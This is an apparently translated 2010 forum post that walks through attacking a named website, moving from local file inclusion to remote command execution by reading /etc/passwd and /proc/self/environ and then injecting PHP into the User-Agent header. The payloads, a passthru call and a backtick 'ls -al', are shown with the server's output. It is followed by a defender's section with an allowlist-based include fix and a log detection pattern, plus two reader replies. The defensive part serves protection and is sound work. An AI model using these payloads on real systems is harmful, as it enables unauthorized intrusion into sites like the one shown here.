BugTrack: bodegasite.com from LFI to RCE, or /proc/self/environ
Hi everyone, I wanted to share with you a bug which is not among the most common ones, but which nonetheless, as you will see, has a fatal impact :) (at least the BugTrack palette will be more varied and not just SQLi, XSS...).
Let's start by finding a site where we are able to find an LFI; in our case it will be the site [link]
and the result:
Warning: require(baf) [function.require]: failed to open stream: No such file or directory in /home/bodega/public_html/index.php on line 165
Many of you, after seeing this output, might consider the matter settled and proceed to uploading a shell (LFI --> RFI), but in that case you will be stopped by a PHP directive:
Warning: require() [function.require]: URL file-access is disabled in the server configuration in /home/bodega/public_html/index.php on line 165
So this is where the RFI option ends, but that doesn't bother us :) Next we'll try what all we can include, so:
[link]
and the result:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
...
So we have this useful list at hand, which won't serve us in our matter, but it has other possible uses. At least we have verified that we can include relatively without restriction. Now we proceed to including /proc/self/environ itself:
DOCUMENT_ROOT=/home/bodega/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_CHARSET=windows-1250,utf-8;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_ACCEPT_LANGUAGE=cs,en-us;q=0.7,en;q=0.3
HTTP_CONNECTION=keep-alive
HTTP_HOST=www.bodegasite.com
HTTP_KEEP_ALIVE=115
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
PATH=/bin:/usr/bin
QUERY_STRING=page=../../../../../../proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=62.168.8.65
REMOTE_PORT=7663
REQUEST_METHOD=GET
REQUEST_URI=/?page=../../../../../../proc/self/environ
SCRIPT_FILENAME=/home/bodega/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=208.77.96.52
SERVER_ADMIN=webmaster@bodegasite.com
SERVER_NAME=www.bodegasite.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=
The sharper among you will notice that there is one thing in the output we can influence, namely "HTTP_USER_AGENT". Personally I use the FF browser, so for this purpose I use the User Agent Switcher add-on ([link]).
Turn on User Agent Switcher and change the user agent to <? passthru($_GET[xxx]) ?>.
Then call the following link:
[link]
We expect a listing of the directory structure, but lo and behold:
Parse error: syntax error, unexpected T_STRING in /proc/27898/environ on line 1
After a bit of investigation you'll find out that the parentheses "()" don't get through, which is rather unlucky, since functions in PHP need parentheses (please don't hold me to that literally; the functions we need do need them :) ).
Fortunately PHP supports the execution operator, aka the backtick. With this knowledge we fire up the agent switcher again and put this in it:
<?php $prikaz = `ls -al`; echo "$prikaz";?>
And the result:
total 19156
drwxr-x--- 18 bodega nobody 4096 Jun 26 15:28 .
drwx--x--x 17 bodega bodega 4096 Jul 15 23:50 ..
-rw------- 1 bodega bodega 14 Jul 5 06:28 .ftpquota
-rw-r--r-- 1 bodega bodega 1 Jun 11 2007 .htaccess
drwxr-xr-x 2 bodega bodega 4096 Jun 20 2007 .smileys
-rw-r--r-- 1 bodega bodega 7381 Jun 20 2007 .wysiwygPro_edit_index_html.php
-rw-r--r-- 1 bodega bodega 3812 Dec 26 2007 .wysiwygPro_edit_product_html.php
-rw-r--r-- 1 bodega bodega 3497 Feb 17 16:21 ClearOverPlaySeekMute.swf
drwxr-xr-x 2 bodega bodega 4096 May 30 2007 Connections
-rw-r--r-- 1 bodega bodega 65536 Apr 29 11:18 UTC55i.AVI
drwxr-xr-x 2 bodega bodega 4096 May 1 2007 _notes
drwxr-xr-x 7 bodega bodega 4096 Jun 19 15:33 admin
-rw-r--r-- 1 bodega bodega 2726550 Jun 11 2007 bodegaheader.gif
-rw-r--r-- 1 bodega bodega 47891 May 1 2007 bodegaheader.jpg
drwxr-xr-x 2 bodega bodega 4096 Apr 28 2007 cgi-bin
drwxr-xr-x 9 bodega bodega 4096 Jun 4 2007 chat
-rw-r--r-- 1 bodega bodega 4312 Jul 26 2007 confin.html
-rw-r--r-- 1 bodega bodega 9085 Aug 2 2007 confin.php
-rw-r--r-- 1 bodega bodega 1214 Sep 28 2006 cons.jpg
-rw-r--r-- 1 bodega bodega 4521 Jan 30 2009 contactus.html
-rw-r--r-- 1 bodega bodega 4780 Jul 27 2007 desktop.php
-rw-r--r-- 1 bodega bodega 13703 Jul 17 2007 desktopseries.html
-rw-r--r-- 1 bodega bodega 19378 May 1 2007 desktopseries1.html
So we have achieved the ability to run an arbitrary command via LFI. Thanks for reading and I hope this piece of text gave you something.
Player aka RnmX4 (Player1, 62.168.8.*, 16.7.2010 14:18)
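From the defender's side, the root cause in the post is an include whose argument comes straight from the `page` query parameter (the `require()` warning from index.php line 165 shows this), so the `allow_url_*` directive only closed the RFI door and left every local file, /proc/self/environ included, reachable. The following is an added example, not code from the post or from the bodegasite.com site: a hardened replacement for that include pattern, plus a small log-line check for the two indicators the technique leaves behind (a path to /proc/*/environ in the request and PHP tags or backticks in a header). The `PAGES` map, `resolvePage`, `isEnvironProbe`, the file names and the sample log lines are all constructed for the example.

```php
<?php
// Added example (not from the post or from bodegasite.com). PHP 7.1+.
// Names, the PAGES map and the sample log lines below are constructed.

// Vulnerable shape described in the post (index.php line 165):
//   require($_GET['page']);
// Anything readable on disk, /proc/self/environ included, can be loaded.

// Hardened: the request selects a KEY, never a path. The allowlist maps
// keys to files under one fixed directory; realpath() resolves "..",
// symlinks and missing files, so nothing outside $baseDir gets through.
const PAGES = [
    'home'    => 'home.php',       // constructed file names
    'contact' => 'contactus.php',
];

function resolvePage(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                      // unknown key: refuse, do not guess
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $full === false) {
        return null;                      // base or target does not exist
    }
    // Prefix check with the separator appended, so "/var/www2" does not
    // pass as being inside "/var/www".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Detection: indicators of the post's technique, applied to an Apache
// combined-log line (or to the raw request line and User-Agent header).
function isEnvironProbe(string $logLine): bool
{
    // 1. Any reference to /proc/self/environ or /proc/<pid>/environ,
    //    whether reached by "../" traversal or by an absolute path.
    $environ = '#proc/(?:self|\d+)/environ#i';
    // 2. PHP open tags, the passthru() name, or a backtick pair in the
    //    line, i.e. code smuggled into a header such as the User-Agent.
    $phpCode = '#<\?(?:php)?\b|\bpassthru\b|`[^`]*`#i';
    return preg_match($environ, $logLine) === 1 || preg_match($phpCode, $logLine) === 1;
}

// Usage on constructed log lines (only the second one is a normal request).
$sampleLog = [
    '62.168.8.65 - - [16/Jul/2010:14:18:00 +0200] "GET /?page=../../../../../../proc/self/environ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [16/Jul/2010:14:19:00 +0200] "GET /?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Jul/2010:14:20:00 +0200] "GET /?page=home HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"',
];
foreach ($sampleLog as $line) {
    echo (isEnvironProbe($line) ? 'ALERT ' : 'ok    ') . substr($line, 0, 70) . "\n";
}

// Usage of the hardened include in place of require($_GET['page']):
$target = resolvePage($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit;
}
require $target;
```

Two caveats for a practitioner: the allowlist fixes the bug, while `open_basedir` in php.ini is a second, independent fence that would also have kept /proc out of reach of this script; and the log check is a triage aid, since an attacker can encode or split the indicators, so the include fix is the control to rely on.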
re: bodegasite.com from LFI to RCE, or /proc/self/environ
Very nice, I didn't know about the "execution operator aka backtick". Thanks.
----------
Cow power by Gentoo...

re: bodegasite.com from LFI to RCE, or /proc/self/environ
wow, great little thing :) it really is.. (pcdm, 89.103.11.*, 27.7.2010 14:20)